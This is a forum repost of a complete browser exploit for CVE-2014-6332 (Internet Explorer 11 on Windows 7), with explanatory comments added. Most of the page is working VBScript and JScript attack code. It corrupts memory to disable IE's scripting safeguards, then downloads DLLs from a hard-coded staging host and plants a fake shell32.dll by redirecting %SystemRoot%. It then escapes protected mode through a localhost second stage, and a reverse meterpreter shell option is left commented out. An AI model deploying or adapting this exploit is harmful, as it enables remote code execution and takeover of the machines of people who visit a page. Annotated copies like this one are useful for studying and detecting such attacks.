Nytro

CVE-2014-6332 PoC to get shell or bypass protected mode



CVE-2014-6332 PoC to get shell or bypass protected mode

<html>
<head>
<!--
CVE-2014-6332 PoC to get meterpreter shell or bypass IE protected mode
- Tested on IE11 + Windows 7 64-bit

References:
- original PoC - http://www.exploit-db.com/exploits/35229/
- http://blog.trendmicro.com/trendlabs-security-intelligence/a-killer-combo-critical-vulnerability-and-godmode-exploitation-on-cve-2014-6332/
- http://security.coverity.com/blog/2014/Nov/eric-lippert-dissects-cve-2014-6332-a-19-year-old-microsoft-bug.html

- https://www.blackhat.com/docs/us-14/materials/us-14-Yu-Write-Once-Pwn-Anywhere.pdf
- http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-s-No-Place-Like-Localhost-A-Welcoming-Front-Door-To-Medium/ba-p/6560786#.U9v5smN5FHb
-->
<meta http-equiv="x-ua-compatible" content="IE=10">
</head>

<body>

<script language="javascript">
// Page-global XMLHttpRequest: created by getdll() and polled by handler().
var oReq;
// Starts an asynchronous GET for one staging file from the hard-coded host.
// The response body is never read here; the VBScript side instead looks for
// the file in the browser cache afterwards (see OnDownloadDone). Completion is
// observed through handler() via the page-global oReq.
function getdll(downloadFile)
{
    var stagingUrl = "http://192.168.1.100/" + downloadFile;
    oReq = new XMLHttpRequest();
    oReq.open("GET", stagingUrl, true);
    oReq.onreadystatechange = handler;
    oReq.send();
}

// readystatechange callback for oReq. Only a finished request (readyState 4)
// that came back with HTTP 200 hands control to OnDownloadDone, which is a
// VBScript Sub on this page (IE exposes it to JScript as a global). status is
// deliberately not touched before readyState reaches 4.
function handler()
{
    if (oReq.readyState != 4) {
        return;
    }
    if (oReq.status == 200) {
        OnDownloadDone();
    }
}

// Navigates the document to the second-stage page on a loopback listener.
// Presumably that listener is provided by the ielocalserver.dll stage copied
// in loaddll(); the page does not show it, so treat that as unverified.
function tolocal()
{
    var stage2Url = "http://localhost:5555/stage2.html";
    location.href = stage2Url;
}

</script>

<script language="VBScript">
' ---- Staging configuration -------------------------------------------------
' Active set: the local-server files the author uses to reach medium integrity
' (i.e. leave IE protected mode). cacheRegex holds, per file, the pattern used
' to locate its cached copy under Content.IE5.
downloadFiles = Array("ieshell32.dll", "ielocalserver.dll", "stage2.html")
cacheRegex    = Array("^ieshell32\[\d\].dll$", "^ielocalserver\[\d\].dll$", "^stage2\[\d\].htm$")
' Alternative set (reverse meterpreter shell), left disabled by the author:
'downloadFiles = Array("ieshell32.dll", "metp.dll")
'cacheRegex = Array("^ieshell32\[\d\].dll$", "^metp\[\d\].dll$")

' Resolved cache paths, indexed like downloadFiles (fixed array, slots 0..3).
Dim cacheFiles(3)

Dim downloadState   ' index of the file currently being fetched
Dim pinTime         ' timestamp taken before each fetch (only a commented-out check uses it)
Dim oFSO            ' Scripting.FileSystemObject, created in runshell
Dim oWS             ' WScript.Shell, created in runshell
Dim shell           ' Shell.Application, created in loaddll

' Returns the name of the first file directly inside path whose name matches
' regexFile (a VBScript RegExp object), or "" when nothing matches.
' Uses the page-global oFSO; any folder-access error propagates to the caller.
function FindFile(path, regexFile)
    Dim entry, matched
    FindFile = ""
    For Each entry in oFSO.GetFolder(path).Files
        matched = regexFile.Test(entry.Name)
        If matched = True Then
            FindFile = entry.Name
            Exit For
        End If
    Next
end function

' Looks one level down: for each immediate subfolder of path, asks FindFile for
' a match and returns the full path of the first hit, or "" if none is found.
' The author's DateDiff filter against pinTime is disabled in this version, so
' subfolder age is not considered.
function SearchCache(path, regexFile)
    Dim subDir, subPath, hit
    SearchCache = ""
    For Each subDir in oFSO.GetFolder(path).SubFolders
        subPath = path & "\" & subDir.Name
        hit = FindFile(subPath, regexFile)
        If hit <> "" Then
            SearchCache = subPath & "\" & hit
            Exit For
        End If
    Next
end function

' Moves the cached downloads into place and tries to get the planted DLL
' loaded. Every error is suppressed (On Error Resume Next), so a failing step
' is skipped silently and the later steps still run. Sequence:
'   1. copy cached file 0 to <TEMP>\System32\shell32.dll
'   2. copy cached file 1 into <TEMP> and publish its path as %MyDllPath%
'   3. in the three-file configuration, also stage stage2.html as %stage2file%
'   4. save %SystemRoot%, point it at <TEMP>, then create Shell.Application
'   5. remove the temporary System32 copy; with three files, navigate to the
'      local stage-2 page
' GetSpecialFolder(2) is the FileSystemObject TemporaryFolder. Step 4 is
' presumably what makes the planted shell32.dll get picked up from
' <TEMP>\System32 - the page only states that %SystemRoot% has to be restored
' inside the DLL, so confirm the mechanism against the references above.
' Defender note: a script-written <TEMP>\System32\shell32.dll and a browser
' process whose SystemRoot environment variable points at a temp directory are
' the observable artifacts of this step.
function loaddll()
On Error Resume Next

' Process-scoped environment block: changes here do not persist beyond IE.
Set wshSystemEnv = oWS.Environment("Process")
tmpDir = oFSO.GetSpecialFolder(2)

tmpSysDir = tmpDir & "\System32"
tmpShellFile = tmpSysDir & "\shell32.dll"
oFSO.CreateFolder(tmpSysDir)
oFSO.CopyFile cacheFiles(0), tmpShellFile

mydllFile = tmpDir & "\" & downloadFiles(1)
oFSO.CopyFile cacheFiles(1), mydllFile
wshSystemEnv("MyDllPath") = mydllFile

' UBound = 2 only for the three-file (local server) configuration.
If (UBound(downloadFiles) = 2) Then
stage2File = tmpDir & "\stage2.html"
oFSO.CopyFile cacheFiles(2), stage2File
wshSystemEnv("stage2file") = stage2File
End If

' Order matters: the redirected SystemRoot must be in place before
' Shell.Application is instantiated.
saveRoot = wshSystemEnv("SystemRoot")
wshSystemEnv("SaveSystemRoot") = saveRoot
wshSystemEnv("SystemRoot") = tmpDir
Set shell = CreateObject("Shell.Application")
' have to restore %SystemRoot% in dll, not here

' Clean up the planted copy; the DLL is expected to be loaded by now.
oFSO.DeleteFile tmpShellFile
oFSO.DeleteFolder tmpSysDir

If (UBound(downloadFiles) = 2) Then
call tolocal()
End If
end function

' Invoked from the JScript XHR handler once a fetch completes. Locates the
' cached copy of the file just downloaded under the Low-integrity Content.IE5
' cache (the one protected-mode IE writes to), records its path, and either
' requests the next file or, after the last one, hands over to loaddll.
' If the cached copy is not found the chain simply stops - there is no retry.
Sub OnDownloadDone()
    Dim cacheDir, regexFile, found

    cacheDir = oWS.ExpandEnvironmentStrings("%LOCALAPPDATA%") & _
               "\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5"

    Set regexFile = new regexp
    regexFile.Pattern = cacheRegex(downloadState)

    found = SearchCache(cacheDir, regexFile)
    cacheFiles(downloadState) = found
    If found = "" Then Exit Sub

    If downloadState = UBound(downloadFiles) Then
        loaddll()
    Else
        downloadState = downloadState + 1
        DoDownload()
    End If
End Sub

' Stamps pinTime and asks the JScript side (getdll) to fetch the file at the
' current downloadState index.
Sub DoDownload()
    pinTime = Now
    getdll downloadFiles(downloadState)
End Sub

' Called from Begin() after EnableGodMode: creates the COM helpers and starts
' the download chain at file 0. IE would normally refuse to create these
' ProgIDs from a web page; the page presumably relies on the preceding
' EnableGodMode step for that, which is why this runs last.
Sub runshell()
    downloadState = 0
    Set oFSO = CreateObject("Scripting.FileSystemObject")
    Set oWS  = CreateObject("WScript.Shell")
    DoDownload
End Sub

</script>

<script language="VBScript">
' Dynamic arrays resized by Trigger(); once the corruption attempt succeeds the
' remaining functions read and write through them.
dim arrX()
dim arrY()

' Sizes picked in Init() and grown in Exploit(); olapPos is set by Trigger().
dim asize, incsize, olapPos

' Runs as soon as this script block is parsed (VBScript procedures are
' available regardless of their position in the block).
Begin()

' Top-level driver. Picks sizes, runs the retry loop in Exploit(), and only on
' success lifts the scripting restriction (EnableGodMode) and starts the
' staging chain (runshell). On Error Resume Next applies to the whole body, so
' any failure in the later steps is ignored rather than reported.
function Begin()
On Error Resume Next
Init()
If Exploit() = True Then
EnableGodMode()
' Shrink arrX back to its nominal size before the COM-heavy stage runs.
redim Preserve arrX(asize)
runshell()
End If
end function

' Chooses the randomised starting array size and growth step used by Exploit().
' Rnd's argument only selects which number of the sequence is returned (a
' positive argument means "next"), so asize is 13 + 17*[0,1) and incsize is
' 7 + 3*[0,1); both are fractional until VBScript rounds them in ReDim.
function Init()
    Dim draw1, draw2
    Randomize
    draw1 = rnd(6)
    draw2 = rnd(5)
    asize = 13 + 17 * draw1
    incsize = 7 + 3 * draw2
end function

' Retry loop: grows asize by incsize and calls Trigger() up to 401 times.
' Returns True on the first successful Trigger(), False if none succeeds.
function Exploit()
    Dim attempt
    Exploit = False
    attempt = 0
    Do While attempt <= 400
        asize = asize + incsize
        If Trigger() = True Then
            Exploit = True
            Exit Do
        End If
        attempt = attempt + 1
    Loop
end function

' One corruption attempt for the current asize. Returns True when the check at
' the end sees the expected VarType, False otherwise (arrX is then shrunk back
' to asize). On Error Resume Next keeps a failing ReDim from aborting the call.
function Trigger()
On Error Resume Next
dim typev
dim ofnumele

Trigger = False
' Index just past the nominal bound; the other functions read and write
' arrX through this slot.
olapPos = asize + 2
' asize with bit 27 (&h8000000) set; the oversized ReDim Preserve below is the
' CVE-2014-6332 condition discussed in the references at the top of the page.
ofnumele = asize + &h8000000

redim Preserve arrX(asize)
redim arrY(asize)
redim Preserve arrX(ofnumele)

typev = 1
' Stores a Double in arrY; the reads that follow check whether arrX's
' out-of-bounds slots now reflect it. The name olapPos suggests the two
' arrays are meant to overlap - not verifiable from the listing.
arrY(0) = 1.123456789012345678901234567890

' Guarded reads: only sample VarType(arrX(olapPos)) when the neighbouring
' slot is non-empty and neither slot holds an object.
If (IsObject(arrX(olapPos-1)) = False) Then
If (VarType(arrX(olapPos-1)) <> 0) Then
If (IsObject(arrX(olapPos)) = False) Then
typev = VarType(arrX(olapPos))
End If
End If
End If

' &h2f66 is the VarType the PoC treats as success; the page does not explain
' where that value comes from.
If (typev = &h2f66) Then
Trigger = True
Else
redim Preserve arrX(asize)
End If
end function

' Read primitive built on the overlapped arrays: stores addr+4 in arrX(olapPos)
' while arrY(0) is 0, sets arrY(0) to 8, then returns lenb() of that slot.
' The two numbers look like VARIANT type codes (0 = VT_EMPTY, 8 = VT_BSTR),
' which would mean arrY(0) aliases the type field of arrX(olapPos) - an
' inference from the names, not something the listing states. The name
' promises a 4-byte read at addr; the return value is whatever lenb reports.
function ReadMemInt(addr)
arrY(0) = 0
arrX(olapPos) = addr+4
arrY(0) = 8
ReadMemInt = lenb(arrX(olapPos))
end function

' Named after the "GodMode" technique in the Trend Micro reference above.
' Starting from the value LeakFnAddr() returns, follows two ReadMemInt hops,
' then scans a table at offset &h120 (window of &h60 bytes, 4 at a time) for
' the first slot holding 14 and overwrites it through a fabricated array
' (myarray / arrY(2)). Offsets are hard-coded for the build named in the
' header (IE11 on Windows 7 x64). Returns True if a slot was patched.
' i, j, k and myarray are implicit locals (no Option Explicit on this page).
' Presumably this is what lets runshell() create otherwise-blocked COM
' objects; the page itself does not say what the patched value controls.
function EnableGodMode()
i = LeakFnAddr()
i = ReadMemInt(i+8)
i = ReadMemInt(i+16)

' Raw bytes placed into arrX(olapPos+2); 8192 + 12 is &h200C, which reads as
' VT_ARRAY | VT_VARIANT if arrY(2) aliases that slot's type field (inferred).
myarray = Unescape("%u0001%u0880%u0001%u0000%u0000%u0000%u0000%u0000%uFFFF%u7FFF%u0000%u0000")
arrX(olapPos+2) = myarray
arrY(2) = 8192 + 12

EnableGodMode = False
For k=0 To &h60 step 4
j = ReadMemInt(i+&h120+k)
If (j = 14) Then
' Write through the fabricated array: index &h11c+k relative to i.
arrX(olapPos+2)(i+&h11c+k) = arrY(4)
EnableGodMode = True
Exit For
End If
Next
end function

' Intentionally empty. Exists only so that LeakFnAddr() has a procedure name
' to assign to i.
sub dummyfn()
end sub

' Produces the number EnableGodMode() treats as an address. Assigns dummyfn to
' i under On Error Resume Next (so a type error here is swallowed), then null,
' stores i in arrX(olapPos), sets arrY(0) to 3 (VT_I4 in VARIANT terms) and
' reads the slot back. What value i actually carries after the first two
' assignments is not determinable from this listing; i is an implicit local.
function LeakFnAddr()
On Error Resume Next
i = dummyfn
i = null
arrY(0) = 0
arrX(olapPos) = i
arrY(0) = 3
LeakFnAddr = arrX(olapPos)
end function
</script>
</body>
</html>

Sursa: https://gist.github.com/worawit/1213febe36aa8331e092
